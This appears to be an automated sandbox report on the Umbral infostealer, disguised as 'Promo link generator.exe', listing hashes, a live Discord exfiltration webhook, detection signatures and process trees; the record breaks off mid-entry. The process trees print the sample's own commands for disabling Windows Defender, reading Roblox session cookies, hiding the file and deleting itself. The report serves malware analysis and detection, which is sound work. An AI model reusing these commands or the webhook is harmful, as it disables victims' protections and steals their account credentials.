umbral | cfb4919168697ab5bfaa045cbf2c647aa55c1ffc8f5109acf90f2e90af14f40a

Resubmissions

01-02-2024 15:13

240201-sl2ssaacgq 10

01-02-2024 15:00

240201-sdlrlaaagq 10

Analysis

max time kernel
304s
max time network
309s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
01-02-2024 15:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Promo link generator.exe
Size

228KB
MD5

4e711e7231a67ebf4278a6ba9e2a1f98
SHA1

9bc200a14d089e0fe869674ee5f4219e86dc3009
SHA256

cfb4919168697ab5bfaa045cbf2c647aa55c1ffc8f5109acf90f2e90af14f40a
SHA512

38ac5f01c19304431f1b862172fd0ed7b67fd8926c94e289a7a9b06a6772b02c7708f9ebeb3263269721d379dede458bd29d16fd6eb81eb500d85b202707ec0f
SSDEEP

6144:BloZMUrIkd8g+EtXHkv/iD409mMN5nsAv9R0STTKg/Yb8e1mIi:zoZrL+EP8gmMN5nsAv9R0STTKBm

Score

10^/10

umbral spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1196551286892535848/BI-4wJMe0VqcV998bhbMUu_wWa9MHqKDsvG2bhmZuynbA6FvVmQpf3BApw4_YqBZ6TZ5

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/memory/2812-0-0x00000217F2720000-0x00000217F2760000-memory.dmp	family_umbral
behavioral1/files/0x000100000002a872-377.dat	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Promo link generator.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Promo link generator.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Promo link generator.exe

Executes dropped EXE 2 IoCs

pid	Process
6004	Promo link generator.exe
4872	Promo link generator.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com
76	discord.com
78	discord.com
83	discord.com
86	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
76	ip-api.com

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
952	wmic.exe
5768	wmic.exe
2408	wmic.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Amruus promo link generator.rar:Zone.Identifier	firefox.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1280	PING.EXE
5620	PING.EXE
4428	PING.EXE

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
4728	powershell.exe
4728	powershell.exe
1652	powershell.exe
1652	powershell.exe
3020	powershell.exe
3020	powershell.exe
2272	powershell.exe
2272	powershell.exe
2136	powershell.exe
2136	powershell.exe
4068	powershell.exe
4068	powershell.exe
4068	powershell.exe
2376	powershell.exe
2376	powershell.exe
2376	powershell.exe
4864	powershell.exe
4864	powershell.exe
4864	powershell.exe
5856	powershell.exe
5856	powershell.exe
5856	powershell.exe
4068	powershell.exe
4068	powershell.exe
4068	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
5184	powershell.exe
5184	powershell.exe
5184	powershell.exe
1332	powershell.exe
1332	powershell.exe
1332	powershell.exe
3104	powershell.exe
3104	powershell.exe
3104	powershell.exe
4432	powershell.exe
4432	powershell.exe
4432	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5872	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2812	Promo link generator.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeIncreaseQuotaPrivilege	2948	wmic.exe
Token: SeSecurityPrivilege	2948	wmic.exe
Token: SeTakeOwnershipPrivilege	2948	wmic.exe
Token: SeLoadDriverPrivilege	2948	wmic.exe
Token: SeSystemProfilePrivilege	2948	wmic.exe
Token: SeSystemtimePrivilege	2948	wmic.exe
Token: SeProfSingleProcessPrivilege	2948	wmic.exe
Token: SeIncBasePriorityPrivilege	2948	wmic.exe
Token: SeCreatePagefilePrivilege	2948	wmic.exe
Token: SeBackupPrivilege	2948	wmic.exe
Token: SeRestorePrivilege	2948	wmic.exe
Token: SeShutdownPrivilege	2948	wmic.exe
Token: SeDebugPrivilege	2948	wmic.exe
Token: SeSystemEnvironmentPrivilege	2948	wmic.exe
Token: SeRemoteShutdownPrivilege	2948	wmic.exe
Token: SeUndockPrivilege	2948	wmic.exe
Token: SeManageVolumePrivilege	2948	wmic.exe
Token: 33	2948	wmic.exe
Token: 34	2948	wmic.exe
Token: 35	2948	wmic.exe
Token: 36	2948	wmic.exe
Token: SeIncreaseQuotaPrivilege	2948	wmic.exe
Token: SeSecurityPrivilege	2948	wmic.exe
Token: SeTakeOwnershipPrivilege	2948	wmic.exe
Token: SeLoadDriverPrivilege	2948	wmic.exe
Token: SeSystemProfilePrivilege	2948	wmic.exe
Token: SeSystemtimePrivilege	2948	wmic.exe
Token: SeProfSingleProcessPrivilege	2948	wmic.exe
Token: SeIncBasePriorityPrivilege	2948	wmic.exe
Token: SeCreatePagefilePrivilege	2948	wmic.exe
Token: SeBackupPrivilege	2948	wmic.exe
Token: SeRestorePrivilege	2948	wmic.exe
Token: SeShutdownPrivilege	2948	wmic.exe
Token: SeDebugPrivilege	2948	wmic.exe
Token: SeSystemEnvironmentPrivilege	2948	wmic.exe
Token: SeRemoteShutdownPrivilege	2948	wmic.exe
Token: SeUndockPrivilege	2948	wmic.exe
Token: SeManageVolumePrivilege	2948	wmic.exe
Token: 33	2948	wmic.exe
Token: 34	2948	wmic.exe
Token: 35	2948	wmic.exe
Token: 36	2948	wmic.exe
Token: SeIncreaseQuotaPrivilege	4720	wmic.exe
Token: SeSecurityPrivilege	4720	wmic.exe
Token: SeTakeOwnershipPrivilege	4720	wmic.exe
Token: SeLoadDriverPrivilege	4720	wmic.exe
Token: SeSystemProfilePrivilege	4720	wmic.exe
Token: SeSystemtimePrivilege	4720	wmic.exe
Token: SeProfSingleProcessPrivilege	4720	wmic.exe
Token: SeIncBasePriorityPrivilege	4720	wmic.exe
Token: SeCreatePagefilePrivilege	4720	wmic.exe
Token: SeBackupPrivilege	4720	wmic.exe
Token: SeRestorePrivilege	4720	wmic.exe
Token: SeShutdownPrivilege	4720	wmic.exe
Token: SeDebugPrivilege	4720	wmic.exe
Token: SeSystemEnvironmentPrivilege	4720	wmic.exe
Token: SeRemoteShutdownPrivilege	4720	wmic.exe
Token: SeUndockPrivilege	4720	wmic.exe
Token: SeManageVolumePrivilege	4720	wmic.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
5872	7zFM.exe
5872	7zFM.exe
5604	7zG.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe

Suspicious use of SetWindowsHookEx 22 IoCs

pid	Process
3192	OpenWith.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
4512	MiniSearchHost.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
2564	firefox.exe
5632	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2812 wrote to memory of 1180	2812	Promo link generator.exe	79
PID 2812 wrote to memory of 1180	2812	Promo link generator.exe	79
PID 2812 wrote to memory of 4728	2812	Promo link generator.exe	82
PID 2812 wrote to memory of 4728	2812	Promo link generator.exe	82
PID 2812 wrote to memory of 1652	2812	Promo link generator.exe	85
PID 2812 wrote to memory of 1652	2812	Promo link generator.exe	85
PID 2812 wrote to memory of 3020	2812	Promo link generator.exe	86
PID 2812 wrote to memory of 3020	2812	Promo link generator.exe	86
PID 2812 wrote to memory of 2272	2812	Promo link generator.exe	88
PID 2812 wrote to memory of 2272	2812	Promo link generator.exe	88
PID 2812 wrote to memory of 2948	2812	Promo link generator.exe	90
PID 2812 wrote to memory of 2948	2812	Promo link generator.exe	90
PID 2812 wrote to memory of 4720	2812	Promo link generator.exe	94
PID 2812 wrote to memory of 4720	2812	Promo link generator.exe	94
PID 2812 wrote to memory of 756	2812	Promo link generator.exe	96
PID 2812 wrote to memory of 756	2812	Promo link generator.exe	96
PID 2812 wrote to memory of 2136	2812	Promo link generator.exe	97
PID 2812 wrote to memory of 2136	2812	Promo link generator.exe	97
PID 2812 wrote to memory of 952	2812	Promo link generator.exe	99
PID 2812 wrote to memory of 952	2812	Promo link generator.exe	99
PID 2812 wrote to memory of 1396	2812	Promo link generator.exe	101
PID 2812 wrote to memory of 1396	2812	Promo link generator.exe	101
PID 1396 wrote to memory of 1280	1396	cmd.exe	103
PID 1396 wrote to memory of 1280	1396	cmd.exe	103
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 3832 wrote to memory of 2564	3832	firefox.exe	120
PID 2564 wrote to memory of 2976	2564	firefox.exe	121
PID 2564 wrote to memory of 2976	2564	firefox.exe	121
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122
PID 2564 wrote to memory of 4520	2564	firefox.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1180	attrib.exe
6112	attrib.exe
5892	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Promo link generator.exe
"C:\Users\Admin\AppData\Local\Temp\Promo link generator.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Promo link generator.exe"
  2⤵
  - Views/modifies file attributes
  PID:1180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Promo link generator.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2948
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4720
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2136
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:952
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Promo link generator.exe" && pause
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:1280

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2884

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4724

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:4952

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3192

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3832
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.0.871051082\432192340" -parentBuildID 20221007134813 -prefsHandle 1824 -prefMapHandle 1816 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ef8c99e-d4ab-4221-bc2e-a0a05f9a569d} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 1904 217290f3458 gpu
    3⤵
    PID:2976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.1.676468959\1468100709" -parentBuildID 20221007134813 -prefsHandle 2272 -prefMapHandle 2268 -prefsLen 20783 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7cd9a9a6-7168-46e7-aa3f-b42b61aaf1f8} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 2284 2171cf72b58 socket
    3⤵
    - Checks processor information in registry
    PID:4520
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.2.621233315\547245660" -childID 1 -isForBrowser -prefsHandle 2792 -prefMapHandle 3020 -prefsLen 20821 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7579e9b9-bf02-44f7-9e01-db59b16543f1} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 3088 2172e29cc58 tab
    3⤵
    PID:2488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.3.1744314053\78225233" -childID 2 -isForBrowser -prefsHandle 3776 -prefMapHandle 3716 -prefsLen 26064 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bb85b69-ebfb-4a73-b14f-71c5c505a376} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 3792 2172b8ec858 tab
    3⤵
    PID:5048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.4.1005088625\957429710" -childID 3 -isForBrowser -prefsHandle 4660 -prefMapHandle 4656 -prefsLen 26123 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b41e071-bea9-4984-b93b-838146517404} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 4664 217301f3e58 tab
    3⤵
    PID:2972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.6.1309032670\1787150925" -childID 5 -isForBrowser -prefsHandle 5324 -prefMapHandle 5328 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4264e0c6-3c83-4615-a968-f63840195a0e} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 5316 2172fee5758 tab
    3⤵
    PID:4356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.5.1970111552\1361805958" -childID 4 -isForBrowser -prefsHandle 5164 -prefMapHandle 5176 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3fb3331-8d7f-48e7-8733-b7d3a9d74037} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 5180 2172e261958 tab
    3⤵
    PID:5088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.7.2093783221\220940273" -childID 6 -isForBrowser -prefsHandle 5492 -prefMapHandle 5300 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87ca83c2-656d-4445-9abe-9dbf7eaaa938} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 5540 217301f5358 tab
    3⤵
    PID:3480
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.8.414648527\2096696375" -childID 7 -isForBrowser -prefsHandle 6076 -prefMapHandle 6072 -prefsLen 26723 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c05db0b4-5e8f-408d-a102-29760a702c45} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 6084 217321a2a58 tab
    3⤵
    PID:3496
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2564.9.1894302829\1825144261" -childID 8 -isForBrowser -prefsHandle 6180 -prefMapHandle 6176 -prefsLen 26723 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e0ad9e6-7e7f-4aa6-ab2f-4873e1347b39} 2564 "\\.\pipe\gecko-crash-server-pipe.2564" 6188 2171cf65958 tab
    3⤵
    PID:1768

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4512

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Amruus promo link generator.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:5872

C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe
"C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:6004
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
  2⤵
  - Views/modifies file attributes
  PID:6112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe'
  2⤵
  PID:4068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5856
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:3104
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5296
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4068
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5768
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe" && pause
  2⤵
  PID:5472
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:5620

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6949:116:7zEvent10412
1⤵
- Suspicious use of FindShellTrayWindow
PID:5604

C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe
"C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4872
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
  2⤵
  - Views/modifies file attributes
  PID:5892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
